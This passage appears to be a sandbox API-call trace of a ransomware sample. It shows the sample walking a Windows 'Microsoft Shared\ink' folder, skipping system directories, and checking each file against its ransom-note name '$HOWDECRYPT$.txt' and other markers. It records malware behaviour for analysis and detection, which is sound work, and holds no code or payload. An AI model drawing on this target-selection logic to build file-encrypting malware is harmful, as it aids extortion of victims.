(lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\$HOWDECRYPT$.txt") returned 88 [0086.905] GetProcessHeap () returned 0x2c0000 [0086.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf2) returned 0x353a38 [0086.905] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9a0) returned 0x3867e8 [0086.905] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.905] lstrcmpiW (lpString1="hwrenalm.dat", lpString2="Windows") returned -1 [0086.905] lstrlenW (lpString="Windows") returned 7 [0086.905] lstrcmpiW (lpString1="hwrenalm.dat", lpString2="$Recycle.bin") returned 1 [0086.905] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.905] lstrcmpiW (lpString1="hwrenalm.dat", lpString2="System Volume Information") returned -1 [0086.905] lstrlenW (lpString="System Volume Information") returned 25 [0086.905] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat") returned 67 [0086.905] StrStrIW (lpFirst="hwrenalm.dat", lpSrch=".spyhunter") returned 0x0 [0086.905] lstrcmpW (lpString1="hwrenalm.dat", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.906] lstrcmpW (lpString1="hwrenalm.dat", lpString2="_uninstalling_.png") returned 1 [0086.906] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat") returned 67 [0086.906] GetProcessHeap () returned 0x2c0000 [0086.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x370cb8 [0086.906] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9a8) returned 0x3867e8 [0086.906] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.906] lstrcmpiW (lpString1="hwrenclm.dat", lpString2="Windows") returned -1 [0086.906] lstrlenW (lpString="Windows") returned 7 [0086.906] lstrcmpiW (lpString1="hwrenclm.dat", lpString2="$Recycle.bin") returned 1 [0086.906] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.906] lstrcmpiW (lpString1="hwrenclm.dat", lpString2="System Volume Information") returned -1 [0086.906] lstrlenW (lpString="System Volume Information") returned 25 [0086.906] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat") returned 67 [0086.906] StrStrIW (lpFirst="hwrenclm.dat", lpSrch=".spyhunter") returned 0x0 [0086.906] lstrcmpW (lpString1="hwrenclm.dat", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.906] lstrcmpW (lpString1="hwrenclm.dat", lpString2="_uninstalling_.png") returned 1 [0086.906] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat") returned 67 [0086.906] GetProcessHeap () returned 0x2c0000 [0086.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x353b38 [0086.906] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9b0) returned 0x3867e8 [0086.906] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.906] lstrcmpiW (lpString1="hwrlatinlm.dat", lpString2="Windows") returned -1 [0086.906] lstrlenW (lpString="Windows") returned 7 [0086.906] lstrcmpiW (lpString1="hwrlatinlm.dat", lpString2="$Recycle.bin") returned 1 [0086.906] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.906] lstrcmpiW (lpString1="hwrlatinlm.dat", lpString2="System Volume Information") returned -1 [0086.906] lstrlenW (lpString="System Volume Information") returned 25 [0086.906] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat") returned 69 [0086.906] StrStrIW (lpFirst="hwrlatinlm.dat", lpSrch=".spyhunter") returned 0x0 [0086.906] lstrcmpW (lpString1="hwrlatinlm.dat", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.906] lstrcmpW (lpString1="hwrlatinlm.dat", lpString2="_uninstalling_.png") returned 1 [0086.906] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat") returned 69 [0086.907] GetProcessHeap () returned 0x2c0000 [0086.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x324560 [0086.907] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9b8) returned 0x3867e8 [0086.907] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.907] lstrcmpiW (lpString1="hwruklm.dat", lpString2="Windows") returned -1 [0086.907] lstrlenW (lpString="Windows") returned 7 [0086.907] lstrcmpiW (lpString1="hwruklm.dat", lpString2="$Recycle.bin") returned 1 [0086.907] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.907] lstrcmpiW (lpString1="hwruklm.dat", lpString2="System Volume Information") returned -1 [0086.907] lstrlenW (lpString="System Volume Information") returned 25 [0086.907] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat") returned 66 [0086.907] StrStrIW (lpFirst="hwruklm.dat", lpSrch=".spyhunter") returned 0x0 [0086.907] lstrcmpW (lpString1="hwruklm.dat", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.907] lstrcmpW (lpString1="hwruklm.dat", lpString2="_uninstalling_.png") returned 1 [0086.907] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat") returned 66 [0086.907] GetProcessHeap () returned 0x2c0000 [0086.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc6) returned 0x353c08 [0086.907] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9c0) returned 0x3867e8 [0086.907] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.907] lstrcmpiW (lpString1="hwruksh.dat", lpString2="Windows") returned -1 [0086.907] lstrlenW (lpString="Windows") returned 7 [0086.907] lstrcmpiW (lpString1="hwruksh.dat", lpString2="$Recycle.bin") returned 1 [0086.907] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.907] lstrcmpiW (lpString1="hwruksh.dat", lpString2="System Volume Information") returned -1 [0086.907] lstrlenW (lpString="System Volume Information") returned 25 [0086.907] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat") returned 66 [0086.907] StrStrIW (lpFirst="hwruksh.dat", lpSrch=".spyhunter") returned 0x0 [0086.907] lstrcmpW (lpString1="hwruksh.dat", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.907] lstrcmpW (lpString1="hwruksh.dat", lpString2="_uninstalling_.png") returned 1 [0086.908] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat") returned 66 [0086.908] GetProcessHeap () returned 0x2c0000 [0086.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc6) returned 0x353cd8 [0086.908] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9c8) returned 0x3867e8 [0086.908] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.908] lstrcmpiW (lpString1="hwrusalm.dat", lpString2="Windows") returned -1 [0086.908] lstrlenW (lpString="Windows") returned 7 [0086.908] lstrcmpiW (lpString1="hwrusalm.dat", lpString2="$Recycle.bin") returned 1 [0086.908] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.908] lstrcmpiW (lpString1="hwrusalm.dat", lpString2="System Volume Information") returned -1 [0086.908] lstrlenW (lpString="System Volume Information") returned 25 [0086.908] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat") returned 67 [0086.908] StrStrIW (lpFirst="hwrusalm.dat", lpSrch=".spyhunter") returned 0x0 [0086.908] lstrcmpW (lpString1="hwrusalm.dat", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.908] lstrcmpW (lpString1="hwrusalm.dat", lpString2="_uninstalling_.png") returned 1 [0086.908] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat") returned 67 [0086.908] GetProcessHeap () returned 0x2c0000 [0086.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x353da8 [0086.908] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9d0) returned 0x3867e8 [0086.908] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.908] lstrcmpiW (lpString1="hwrusash.dat", lpString2="Windows") returned -1 [0086.908] lstrlenW (lpString="Windows") returned 7 [0086.908] lstrcmpiW (lpString1="hwrusash.dat", lpString2="$Recycle.bin") returned 1 [0086.908] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.908] lstrcmpiW (lpString1="hwrusash.dat", lpString2="System Volume Information") returned -1 [0086.908] lstrlenW (lpString="System Volume Information") returned 25 [0086.908] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat") returned 67 [0086.908] StrStrIW (lpFirst="hwrusash.dat", lpSrch=".spyhunter") returned 0x0 [0086.908] lstrcmpW (lpString1="hwrusash.dat", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.908] lstrcmpW (lpString1="hwrusash.dat", lpString2="_uninstalling_.png") returned 1 [0086.908] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat") returned 67 [0086.909] GetProcessHeap () returned 0x2c0000 [0086.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x353e78 [0086.909] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9d8) returned 0x3867e8 [0086.909] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.909] lstrcmpiW (lpString1="InkDiv.dll", lpString2="Windows") returned -1 [0086.909] lstrlenW (lpString="Windows") returned 7 [0086.909] lstrcmpiW (lpString1="InkDiv.dll", lpString2="$Recycle.bin") returned 1 [0086.909] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.909] lstrcmpiW (lpString1="InkDiv.dll", lpString2="System Volume Information") returned -1 [0086.909] lstrlenW (lpString="System Volume Information") returned 25 [0086.909] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkDiv.dll") returned 65 [0086.909] StrStrIW (lpFirst="InkDiv.dll", lpSrch=".spyhunter") returned 0x0 [0086.909] lstrcmpW (lpString1="InkDiv.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.909] lstrcmpW (lpString1="InkDiv.dll", lpString2="_uninstalling_.png") returned 1 [0086.909] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkDiv.dll") returned 65 [0086.909] GetProcessHeap () returned 0x2c0000 [0086.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x358060 [0086.909] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9e0) returned 0x3867e8 [0086.909] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.909] lstrcmpiW (lpString1="InkObj.dll", lpString2="Windows") returned -1 [0086.909] lstrlenW (lpString="Windows") returned 7 [0086.909] lstrcmpiW (lpString1="InkObj.dll", lpString2="$Recycle.bin") returned 1 [0086.909] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.910] lstrcmpiW (lpString1="InkObj.dll", lpString2="System Volume Information") returned -1 [0086.910] lstrlenW (lpString="System Volume Information") returned 25 [0086.910] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll") returned 65 [0086.910] StrStrIW (lpFirst="InkObj.dll", lpSrch=".spyhunter") returned 0x0 [0086.910] lstrcmpW (lpString1="InkObj.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.910] lstrcmpW (lpString1="InkObj.dll", lpString2="_uninstalling_.png") returned 1 [0086.910] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll") returned 65 [0086.910] GetProcessHeap () returned 0x2c0000 [0086.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x358130 [0086.910] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9e8) returned 0x3867e8 [0086.910] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.910] lstrcmpiW (lpString1="InkWatson.exe", lpString2="Windows") returned -1 [0086.910] lstrlenW (lpString="Windows") returned 7 [0086.910] lstrcmpiW (lpString1="InkWatson.exe", lpString2="$Recycle.bin") returned 1 [0086.910] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.910] lstrcmpiW (lpString1="InkWatson.exe", lpString2="System Volume Information") returned -1 [0086.910] lstrlenW (lpString="System Volume Information") returned 25 [0086.910] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkWatson.exe") returned 68 [0086.910] StrStrIW (lpFirst="InkWatson.exe", lpSrch=".spyhunter") returned 0x0 [0086.910] lstrcmpW (lpString1="InkWatson.exe", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.910] lstrcmpW (lpString1="InkWatson.exe", lpString2="_uninstalling_.png") returned 1 [0086.910] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkWatson.exe") returned 68 [0086.910] GetProcessHeap () returned 0x2c0000 [0086.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x3243b0 [0086.910] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9f0) returned 0x3867e8 [0086.910] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.910] lstrcmpiW (lpString1="InputPersonalization.exe", lpString2="Windows") returned -1 [0086.910] lstrlenW (lpString="Windows") returned 7 [0086.910] lstrcmpiW (lpString1="InputPersonalization.exe", lpString2="$Recycle.bin") returned 1 [0086.910] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.911] lstrcmpiW (lpString1="InputPersonalization.exe", lpString2="System Volume Information") returned -1 [0086.911] lstrlenW (lpString="System Volume Information") returned 25 [0086.911] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InputPersonalization.exe") returned 79 [0086.911] StrStrIW (lpFirst="InputPersonalization.exe", lpSrch=".spyhunter") returned 0x0 [0086.911] lstrcmpW (lpString1="InputPersonalization.exe", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.911] lstrcmpW (lpString1="InputPersonalization.exe", lpString2="_uninstalling_.png") returned 1 [0086.911] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InputPersonalization.exe") returned 79 [0086.911] GetProcessHeap () returned 0x2c0000 [0086.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x372de0 [0086.911] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9f8) returned 0x3867e8 [0086.911] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.911] lstrcmpiW (lpString1="ipscat.xml", lpString2="Windows") returned -1 [0086.911] lstrlenW (lpString="Windows") returned 7 [0086.911] lstrcmpiW (lpString1="ipscat.xml", lpString2="$Recycle.bin") returned 1 [0086.911] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.911] lstrcmpiW (lpString1="ipscat.xml", lpString2="System Volume Information") returned -1 [0086.911] lstrlenW (lpString="System Volume Information") returned 25 [0086.911] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml") returned 65 [0086.911] StrStrIW (lpFirst="ipscat.xml", lpSrch=".spyhunter") returned 0x0 [0086.911] lstrcmpW (lpString1="ipscat.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.911] lstrcmpW (lpString1="ipscat.xml", lpString2="_uninstalling_.png") returned 1 [0086.911] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml") returned 65 [0086.911] GetProcessHeap () returned 0x2c0000 [0086.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x358200 [0086.911] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa00) returned 0x3867e8 [0086.911] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.911] lstrcmpiW (lpString1="ipschs.xml", lpString2="Windows") returned -1 [0086.911] lstrlenW (lpString="Windows") returned 7 [0086.912] lstrcmpiW (lpString1="ipschs.xml", lpString2="$Recycle.bin") returned 1 [0086.912] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.912] lstrcmpiW (lpString1="ipschs.xml", lpString2="System Volume Information") returned -1 [0086.912] lstrlenW (lpString="System Volume Information") returned 25 [0086.912] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml") returned 65 [0086.912] StrStrIW (lpFirst="ipschs.xml", lpSrch=".spyhunter") returned 0x0 [0086.912] lstrcmpW (lpString1="ipschs.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.912] lstrcmpW (lpString1="ipschs.xml", lpString2="_uninstalling_.png") returned 1 [0086.912] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml") returned 65 [0086.912] GetProcessHeap () returned 0x2c0000 [0086.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x3582d0 [0086.912] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa08) returned 0x3867e8 [0086.912] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.912] lstrcmpiW (lpString1="ipscht.xml", lpString2="Windows") returned -1 [0086.912] lstrlenW (lpString="Windows") returned 7 [0086.912] lstrcmpiW (lpString1="ipscht.xml", lpString2="$Recycle.bin") returned 1 [0086.912] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.912] lstrcmpiW (lpString1="ipscht.xml", lpString2="System Volume Information") returned -1 [0086.912] lstrlenW (lpString="System Volume Information") returned 25 [0086.912] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml") returned 65 [0086.912] StrStrIW (lpFirst="ipscht.xml", lpSrch=".spyhunter") returned 0x0 [0086.912] lstrcmpW (lpString1="ipscht.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.912] lstrcmpW (lpString1="ipscht.xml", lpString2="_uninstalling_.png") returned 1 [0086.912] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml") returned 65 [0086.912] GetProcessHeap () returned 0x2c0000 [0086.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x3583a0 [0086.912] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa10) returned 0x3867e8 [0086.912] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.912] lstrcmpiW (lpString1="ipscsy.xml", lpString2="Windows") returned -1 [0086.912] lstrlenW (lpString="Windows") returned 7 [0086.912] lstrcmpiW (lpString1="ipscsy.xml", lpString2="$Recycle.bin") returned 1 [0086.913] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.913] lstrcmpiW (lpString1="ipscsy.xml", lpString2="System Volume Information") returned -1 [0086.913] lstrlenW (lpString="System Volume Information") returned 25 [0086.913] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml") returned 65 [0086.913] StrStrIW (lpFirst="ipscsy.xml", lpSrch=".spyhunter") returned 0x0 [0086.913] lstrcmpW (lpString1="ipscsy.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.913] lstrcmpW (lpString1="ipscsy.xml", lpString2="_uninstalling_.png") returned 1 [0086.913] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml") returned 65 [0086.913] GetProcessHeap () returned 0x2c0000 [0086.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x358470 [0086.913] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa18) returned 0x3867e8 [0086.913] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.913] lstrcmpiW (lpString1="ipsdan.xml", lpString2="Windows") returned -1 [0086.913] lstrlenW (lpString="Windows") returned 7 [0086.913] lstrcmpiW (lpString1="ipsdan.xml", lpString2="$Recycle.bin") returned 1 [0086.913] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.913] lstrcmpiW (lpString1="ipsdan.xml", lpString2="System Volume Information") returned -1 [0086.913] lstrlenW (lpString="System Volume Information") returned 25 [0086.913] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml") returned 65 [0086.913] StrStrIW (lpFirst="ipsdan.xml", lpSrch=".spyhunter") returned 0x0 [0086.913] lstrcmpW (lpString1="ipsdan.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.913] lstrcmpW (lpString1="ipsdan.xml", lpString2="_uninstalling_.png") returned 1 [0086.913] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml") returned 65 [0086.913] GetProcessHeap () returned 0x2c0000 [0086.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x358540 [0086.913] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa20) returned 0x3867e8 [0086.913] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.913] lstrcmpiW (lpString1="ipsdeu.xml", lpString2="Windows") returned -1 [0086.913] lstrlenW (lpString="Windows") returned 7 [0086.913] lstrcmpiW (lpString1="ipsdeu.xml", lpString2="$Recycle.bin") returned 1 [0086.913] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.914] lstrcmpiW (lpString1="ipsdeu.xml", lpString2="System Volume Information") returned -1 [0086.914] lstrlenW (lpString="System Volume Information") returned 25 [0086.914] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml") returned 65 [0086.914] StrStrIW (lpFirst="ipsdeu.xml", lpSrch=".spyhunter") returned 0x0 [0086.914] lstrcmpW (lpString1="ipsdeu.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.914] lstrcmpW (lpString1="ipsdeu.xml", lpString2="_uninstalling_.png") returned 1 [0086.914] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml") returned 65 [0086.914] GetProcessHeap () returned 0x2c0000 [0086.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x358610 [0086.914] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa28) returned 0x3867e8 [0086.914] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.914] lstrcmpiW (lpString1="ipsen.xml", lpString2="Windows") returned -1 [0086.914] lstrlenW (lpString="Windows") returned 7 [0086.914] lstrcmpiW (lpString1="ipsen.xml", lpString2="$Recycle.bin") returned 1 [0086.914] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.914] lstrcmpiW (lpString1="ipsen.xml", lpString2="System Volume Information") returned -1 [0086.914] lstrlenW (lpString="System Volume Information") returned 25 [0086.914] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml") returned 64 [0086.914] StrStrIW (lpFirst="ipsen.xml", lpSrch=".spyhunter") returned 0x0 [0086.914] lstrcmpW (lpString1="ipsen.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.914] lstrcmpW (lpString1="ipsen.xml", lpString2="_uninstalling_.png") returned 1 [0086.914] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml") returned 64 [0086.914] GetProcessHeap () returned 0x2c0000 [0086.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc2) returned 0x3586e0 [0086.914] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa30) returned 0x3867e8 [0086.914] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.914] lstrcmpiW (lpString1="ipsesp.xml", lpString2="Windows") returned -1 [0086.914] lstrlenW (lpString="Windows") returned 7 [0086.914] lstrcmpiW (lpString1="ipsesp.xml", lpString2="$Recycle.bin") returned 1 [0086.914] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.914] lstrcmpiW (lpString1="ipsesp.xml", lpString2="System Volume Information") returned -1 [0086.914] lstrlenW (lpString="System Volume Information") returned 25 [0086.915] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 65 [0086.915] StrStrIW (lpFirst="ipsesp.xml", lpSrch=".spyhunter") returned 0x0 [0086.915] lstrcmpW (lpString1="ipsesp.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.915] lstrcmpW (lpString1="ipsesp.xml", lpString2="_uninstalling_.png") returned 1 [0086.915] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 65 [0086.915] GetProcessHeap () returned 0x2c0000 [0086.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x3587b0 [0086.915] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa38) returned 0x3867e8 [0086.915] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.915] lstrcmpiW (lpString1="IPSEventLogMsg.dll", lpString2="Windows") returned -1 [0086.915] lstrlenW (lpString="Windows") returned 7 [0086.915] lstrcmpiW (lpString1="IPSEventLogMsg.dll", lpString2="$Recycle.bin") returned 1 [0086.915] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.915] lstrcmpiW (lpString1="IPSEventLogMsg.dll", lpString2="System Volume Information") returned -1 